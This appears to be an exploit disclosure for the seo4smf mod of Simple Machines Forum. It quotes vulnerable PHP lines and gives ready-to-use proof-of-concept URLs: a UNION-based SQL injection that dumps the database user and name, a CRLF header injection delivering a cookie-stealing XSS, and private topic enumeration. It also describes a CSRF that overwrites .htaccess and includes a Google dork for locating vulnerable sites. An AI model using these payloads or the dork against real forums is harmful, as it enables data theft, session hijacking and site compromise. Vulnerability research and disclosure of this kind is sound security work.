[1] Inyection SQL Linea 50 al 63 $query = db_query(" SELECT m.ID_TOPIC, m.subject ,b.ID_BOARD, b.name FROM {$db_prefix}messages AS m, {$db_prefix}boards AS b WHERE m.ID_TOPIC = *$topic* AND m.ID_BOARD = b.ID_BOARD IMIT 1", __FILE__, __LINE__); ------------------------------------------------------------------------ Linea 105 al 108 $query = db_query(" SELECT name FROM {$db_prefix}boards AS b WHERE ID_BOARD = *$board* LIMIT 1", __FILE__, __LINE__); ------------------------------------------------------------------------ Linea 125 $request = db_query("SELECT memberName FROM {$db_prefix}members where ID_MEMBER=".*$user*." limit 1", __FILE__, __LINE__); ------------------------------------------------------------------------ Linea 143 $request = db_query("SELECT subject FROM {$db_prefix}tp_articles where id=".*$tpage*." limit 1", __FILE__, __LINE__); Where: Linea 7 al 13 $topic = $_GET['t']; $board = $_GET['b']; $other = $_GET['o']; $user = $_GET['u']; $tpage = $_GET['p']; $action = $_GET['a']; $param = $_GET['param']; Now execute the proof of concept: http://localhost/smf/seo4smf-redirect.php?t=-1 union select 1,2,3…(numero de columnas)…,concat(username(),database()) – GoogleDorks: http://www.google.cl/search?hl=es&q=allinurl%3Aseo4smf-redirect.php&btnG=Buscar+con+Google&meta= [2] Inyection of headers, Cross site Scripting and Path disclosure: Source: if(!empty ($url)){ header ('HTTP/1.1 301 Moved Permanently'); header ('Location: '.$url); exit ; } The proof of concept: http://localhost/seo4smf-redirect.php?a=x%0DLocation:%20javascript:alert(document.cookie); Real test: http://www.jccharry.com/archivos_publicos/xss_seo4smf.png Or print the error with path disclosure. [3] Disclosure in topics: http://localhost/seo4smf-redirect.php?t=[number 1 to total topics].new/topicseen This return the privates forumnames and topicnames. [4] Cross site request forgery and inyection of arbitrary code Source: if (isset($_POST['htaccess'])) { $htaccess = stripslashes($_POST['htaccess']); //str_replace("\\\\","\\",$htaccess); file_put_contents($boarddir."/.htaccess", $htaccess); } csrf -> .htaccess rewrited -> pwned! and xml files. exploits and more in http://foro.elhacker.net/bugs_y_exploits/falla_en_el_mod_seo4smf_para_smf-t241029.0.html and http://www.jccharry.com/blog/2009/01/09/whk_fallas-criticas-en-seo4smf-para-foros-smf-simplemachines-forum.html -={[unica_inc algún dia estaremos juntos]}=-